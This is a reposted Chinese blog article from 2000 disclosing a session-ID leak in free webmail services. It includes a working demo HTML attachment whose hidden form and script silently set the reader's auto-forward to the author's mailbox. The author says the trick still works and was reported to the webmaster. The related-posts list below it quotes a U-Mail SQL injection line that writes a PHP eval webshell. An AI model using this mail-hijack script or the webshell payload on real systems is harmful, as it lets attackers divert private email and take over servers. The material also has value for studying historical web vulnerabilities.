《目前国内一些免费email存在的一个安全漏洞》

最新推荐文章于 2024-04-11 13:45:00 发布
最新推荐文章于 2024-04-11 13:45:00 发布
阅读量848 收藏
点赞数
文章标签: email javascript html input shell browser
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/softart/article/details/1846188
版权
2000年08月27日 09:44:00


该Script源于上个世纪(1999年)一次在设置免费email的自动转发时看到一长串的Url时的想法...

看完这篇文章或许你应该赶紧去检查一下你email中的自动转发中有没有别人的email地址:=(
最好不要随便打开别人发给你的HTML文件...
我们知道,国内好些免费email用户登录后的认证都是靠一长串的Url(如我用ShellTools登
录后是"http://webmail.****.com/shelltools/3s91091u96kDwcgNkojF4vumXaJfhn/SignOn.gen")
及服务端保存的对照IP地址来进行的,在登录后发、看邮件,改个人资料、参数设置、邮件签名、收件助理
及自动转发等都靠这串随机ID:3s91091u96kDwcgNkojF4vumXaJfhn确认,而用户于WEB方式收信并查看你发
给他(她)的HTML附件时可以通过JavaScript的“document.referrer”获得其前一URL即带ID那一串,这时
他(她)的IP跟服务器保存的对照IP是一致的,那么获得这两个前提,聪明的你该知道不怀好意的人可以通过
该方式做那些手脚了吧:=(,下面的Script Demo实现的是将自动转发设置为"ShellTools@21cn.com"(具体
是拿那个免费email做的Demo自己猜吧~)收到该HTML附件打开的话他的自动转发就给加上去了,然后他的
邮件....顺便提一句,象OICQ等好些网站可以将你的注册密码发回你的邮箱...
该说的完了,剩下的就看代码吧,什么,看不懂?...那你来这里干什么?....
(该方式到目前为止还可以通过,但我已经将该文提前email给了email的webmaster,什么时候堵上就
不知道了。)
-----学别人一句"转载请注明出处"~ ---

shell(shelltools@21cn.com) http://shelltools.yeah.net
2000/6/14


〈HTML〉
〈HEAD〉
〈TITLE〉小心用Web方式收信〈/TITLE〉

〈/HEAD〉

〈BODY〉
网管,你好:
****的自动转发等操作存在一些安全问题,在Email用户用〈br〉
WEB方式查看信件时可以使用简单的JavaScript在“自动转发”〈br〉
中填入其它地址,将email转到其它信箱中。请查看本页的原代码中〈br〉
的Script。这个问题在国内的几个免费email中都存在。〈br〉

(如果你正用Web方式查看该email请到 配置 -〉 自动转发 中看看,〈br〉
应该被设为"ShellTools@21cn.com"了)

****用户 shell


〈form method="POST" action="AutoForward.gen" name=AddUserForm target="ShellTools"〉
〈input type=hidden name=SuUser value=〉
〈input type=hidden name=Request value=EditDone 〉
〈input type=hidden name="B1" value=" 更新 "〉
〈input type=hidden name="ForwardAddresses" value="ShellTools@21cn.com"〉
〈/form〉
〈SCRIPT Language=JScript〉
var sr=document.referrer;
var isr;
sr=sr.substring(7,30);
isr=sr.indexOf("/");
sr="http://" + sr.substring(0,isr) + "/Banner.htm";
var sr2=document.referrer;
isr=sr2.indexOf("ReadMiscPart");
if ( isr 〉 20 ){
aw=window.open("about:blank","banner1","width=500,height=60,resizable=no,menubar=no,scrollbars=no");
aw.document.write('〈HTML〉');
aw.document.write('〈HEAD〉');
aw.document.write('〈title〉设置自动转发〈/title〉');
aw.document.write('〈/head〉');
aw.document.write('〈frameset framespacing=0 rows=97%,* frameborder=no border=false〉');
aw.document.write('〈frame name=show src=' + sr + ' scrolling=no〉');
aw.document.write('〈frame name=ShellTools src=main.asp scrolling=no〉');
aw.document.write('〈noframes〉');
aw.document.write('〈body〉');
aw.document.write('〈p〉This page uses frames, but your browser doesnt support them.〈/p〉');
aw.document.write('〈/body〉');
aw.document.write('〈/noframes〉');
aw.document.write('〈/frameset〉');
aw.document.write('〈/html〉 ');
sr2 = sr2.substring(0,isr);
document.AddUserForm.action= sr2 + "AutoForward.gen";
document.AddUserForm.submit();}
window.focus();
〈/SCRIPT〉

〈/BODY〉
〈/HTML〉



Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=3105


softart
关注
电子商务平台技术选型和架构设计
程序员光剑
08-04 1851
在这个时代,在线购物网站和电子商务平台已经成为促进互联网经济增长、服务用户和客户的重要平台。如何搭建一个具备高可用性、安全可靠的电商系统,是一个复杂的工程。作为一名技术人员,我们需要了解当前最新的电商平台架构,并对它们进行选择和优化,来满足我们的业务需求。本文将通过“十八篇”的方式,从基础知识、数据库、前端、后端、中间件、缓存、搜索引擎、消息队列等多个角度,带领读者掌握现代电商平台架构的核心技术细节。
U-Mail邮件系统客户无需担心OpenSSL心脏出血漏洞
U-Mail邮件服务器软件
04-23 911
2014年4月7日OpenSSL发布了安全公告,在OpenSSL1.0.1版本中存在严重漏洞(CVE-2014-0160)。该漏洞导致攻击者可以远程读取存在漏洞版本的OpenSSL服务器内存中多达64K的数据。 很多客户打电话来咨询U-Mail邮件系统的技术支持。 问:“U-Mail邮件系统是否也存在该漏洞?” U-Mail邮件系统的技术支持:“U-Mail邮件系统目前使用的OpenSS
FreeTextBox中存在一个严重的安全漏洞
weixin_34055787的博客
12-13 140
    该漏洞是由博客生活的Emissary Web Home 发现的。首先感谢Emissary Web Home !     该漏洞来自FreeTextBox中的图片库,在图片库中用户可以任意地上传任何文件,比如:aspx文件。我想你会马上意识到这个Bug的严重性,攻击者可以上传任何在服务端执行的破坏性的代码。       该漏洞是FreeTextBox的ImageGallery控件中一处Bug...
U-Mail邮件服务系统任意文件上传+执行漏洞(runtime缺陷与验证绕过)
weixin_33842304的博客
11-02 871
http://www.wooyun.org/bugs/wooyun-2010-061859 转载于:https://www.cnblogs.com/hookjoy/p/4068326.html
大部分政府网站U-mail存在直接拿shell漏洞
weixin_34355559的博客
10-01 460
大部分网站政府网站U-mail存在直接拿shell漏洞加入webmail/userapply.php?execadd=333&DomainID=111直接爆出物理地址 然后将 aa' union select 1,2,3,4,5,6,'<?php eval($_POST1);?>',8,9,10,11,12,13,14 into outfile 'D:/umail/Wor...
【安全牛学习笔记】CSRF跨站请求伪造攻击漏洞的原理及解决办法
edu_aqniu的博客
10-23 1005
CSRF跨站请求伪造攻击漏洞的原理及解决办法 CSRF,夸张请求伪造漏洞 漏洞的原理及修复方法 1.常见的触发场景 2.漏洞原理:浏览器同源策略 3.DEMO 4.漏洞危害 5.如何避免&修复漏洞 WEB clinet server HTTP GET POST csrf漏洞 漏洞原理: Server端接受到用户请求的时候
【网络与系统安全实验】网络扫描与防御技术
Goallegoal的博客
04-03 4170
扫描与防御技术 扫描技术基础 什么是网络扫描器 网络扫描器可以通过执行一些脚本文件来模拟对网络系统进行攻击的行为并记录系统的反应,从而搜索目标网络内的服务器、路由器、交换机和防火墙等设备的类型与版本,以及在这些远程设备上运行的脆弱服务,并报告可能存在的脆弱性。 网络扫描器是一把双刃剑 扫描器是一把“双刃剑”。当它被用作安全评估工具时,是系统管理员保障系统安全的有效工具;当它被用作网络漏洞扫描器时,...
对STIX2.0标准12个构件的解读
热门推荐
fufu_good的博客
01-29 9万+
简介 STIX是一种描述网络威胁信息的结构化语言,STIX 能够以标准化和结构化的方式获取更广泛的网络威胁信息。 STIX 1.0定义了8种构件:可观测数据(Observation)、攻击指标(Indicator)、安全事件(Incident)、攻击活动(Campaign)、威胁主体(Threat Actor)、攻击目标(ExploitTarget)、攻击方法(TTP)、应对措施(CourseOf...
WEB漏洞——CSRF
最新发布
qq_63594215的博客
04-11 814
这次我来讲讲web漏洞的CSRF笔记总结,主要通过原理、类型、示例以及防御的角度展开说明,希望读者受益。CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF,是一种对网站的恶意利用。CSRF是通过伪装用户的请求来利用网站,利用网站漏洞从用户那里盗取信息说白了,就是攻击者盗用了你的身份,以你的名义发送恶意请求。
网页编辑器漏洞大全
07-13
涵盖了诸如常见的FCKeditor、eWebEditor、Cuteditor、Freetextbox、Webhtmleditor、Kindeditor、所谓的eWebEditorNET、所谓的 southidceditor、所谓的bigcneditor
FreeTextBox流传的各种版本和博客使用方法2010-4-13
04-13
FreeTextBox流传的各种版本和博客使用方法2010-4-13.rar
Cute Editor/Webhtmleditor/Kindeditor/Freetextbox网页编辑器漏洞手册
禅心之道的博客
10-19 472
CuteEditorCuteEditor在线编辑器本地包含漏洞影响版本:CuteEditorForNet6.4脆弱描述:可以随意查看网站文件内容,危害较大。***利用:http://www.heimian.com/CuteSoft_Client/CuteEditor/Load.ashx?type=p_w_picpath&file=../../../web.config...
E-mail 工作原理及安全漏洞
小五义
01-24 3953
E-mail工作原理    一个邮件系统的传输包含了用户代理(user Agent)。传输代理(Transfer  Agent及接受代理(Doelivery A_gent)三大部分。用户代理是一个用户端发信和收信的程序,负责将信按照一定的标准包装,然后送至邮件服务器,将信件发出或由邮件服务器收回。    传输代理负责信件的交换和传输,将信件传送至适当的邮件主机,再由接受代理将信件分发至不同的邮件信
窃取邮件内容 破解Email账号的三种方法(转)
08-12 3306
窃取邮件内容 破解Email账号的三种方法(转)[@more@]  电子邮件并不是安全的,在邮件的发送、传送和接收整个过程中的每个环节都可能存在薄弱环节,恶意用户如果利用其漏洞,就能够轻易的破解出账号,获得邮件内容。  一、利用...
电子邮件安全的主要威胁有哪些?
互联网安全研究院
05-28 8224
如果把电子邮件、电子邮箱、电子邮件服务器和用户看成一个电子邮件相关联的系统,从攻击窃密的角度,电子邮件相关的安全保密威胁可概括为四类:电子邮件被截获、电子邮箱被非法登录控制、电子邮件系统被攻击控制、针对特定用户的电子邮件社会工程学攻击。 一、电子邮件被截获 电子邮件作为信息的承载体,其面临的安全保密威胁主要就是邮件被截获,邮件内容外泄。按照电子邮件系统工作原理,电子邮件从发件人到达收件人的...
邮件服务器元传出重大漏洞 目前已出现攻击程序
weixin_34106122的博客
06-14 369
近60%的服务器邮件服务器组件Exim已经通过了一个主要漏洞,允许黑客以最高权限执行任意命令。经过一周的发现,研究人员发现至少有两个群体发动了攻击,包括Linux Servo。用户特别关注他们的目标。 Exim是一种开源邮件传输代理(Mail Tansfer Agent,MTA),广泛用于全球邮件服务器。据统计,目前全球约占57%,超过50万台邮件服务器使用Exim,有些甚至估计有370万台。在...
国内所有Mail安全漏洞
weixin_33836874的博客
01-24 829
先简单说下跨站脚本漏洞,又称为XSS攻击,也称为Html代码注入漏洞,可以知道漏洞的起因是注入了Html代码,危害就是最终在别人浏览器内以浏览者的身份执行任意Html代码。 国内邮箱在跨站脚本攻击防御方面存在漏洞,可以被人引入script脚本,然后通过窃取cookie的手段来进入他人邮箱获得敏感内容。各个邮箱存在的问题可能不同,但是方法是一样的,现在就以163.com的邮箱作为例子。 163.co...
mysql注入提取邮件_U-Mail邮件系统注入2(SQL Injections in MySQL LIMIT clause,无需登录,附获取用户密码脚本)...
weixin_35414484的博客
02-19 857
### 简要描述:SQL Injections in MySQL LIMIT clause,过滤不严,产生盲注,导致可以注射用户名与密码,无需登录### 详细说明:上次搜索只在client搜索,今天无意在fast目录下搜索了下,又发现了一处。注:client的目录下的所有函数必须登录才可以执行,fast的目录无需登录可以执行部分存在的函数,但并不能查看邮件等等。漏洞与上一个原理一样,但文件不同,此...
一个email接受系统
08-27
### 回答1: 您好,我可以为您提供一些关于布置一个email接受系统的建议。首先,您需要选择一个合适的邮件服务器,例如Google Mail或Microsoft Exchange。然后,您需要编写一些代码来处理邮件的接收和处理。您可以使用Python或其他编程语言来编写这些代码。最后,您需要将您的代码部署到您的服务器上,并确保它可以正常运行。如果您需要更详细的指导,请告诉我。 ### 回答2: 布一个email接受系统可以分为几个主要步骤。 首先,我们需要一个电子邮件服务器来接收和存储邮件。我们可以使用流行的邮件服务器软件如Postfix、Sendmail或Exim,或者选择使用云服务提供商如Gmail或Microsoft Exchange。 其次,我们需要为用户创建电子邮件帐户。这可以通过在服务器上设置用户帐户来实现,或者通过使用域名系统(DNS)来配置域名以便在服务器上接受电子邮件。每个用户将会有一个唯一的电子邮件地址,如username@example.com。 第三,我们需要设置邮件客户端来连接到服务器并接收电子邮件。常见的邮件客户端包括Microsoft Outlook、Mozilla Thunderbird和Apple Mail。用户需要在邮件客户端中配置他们的电子邮件地址、服务器名称和端口号等信息,以便能够接收和发送电子邮件。 接下来,我们需要确保服务器和客户端之间的通信是安全的。我们可以使用传输层安全性(TLS)协议来加密邮件的传输过程,以保护用户的隐私和数据安全。 最后,我们还可以添加一些额外的功能来提升用户体验,如自动过滤垃圾邮件、设置自动答复或转发规则等。 总之,布一个email接受系统需要一个邮件服务器,创建用户帐户,配置邮件客户端并保证安全的通信。这样用户就可以方便地接收和发送电子邮件了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值